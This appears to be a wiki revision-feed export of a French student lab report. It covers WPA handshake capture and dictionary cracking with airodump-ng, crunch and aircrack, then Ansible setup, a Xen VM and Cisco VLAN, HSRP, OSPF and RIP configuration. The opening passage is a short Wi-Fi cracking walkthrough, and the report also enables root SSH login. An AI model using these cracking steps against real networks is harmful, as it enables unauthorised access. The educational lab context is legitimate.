 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52018</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52018"/>
				<updated>2020-01-05T15:12:28Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Liaison R1 vers COM-1 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
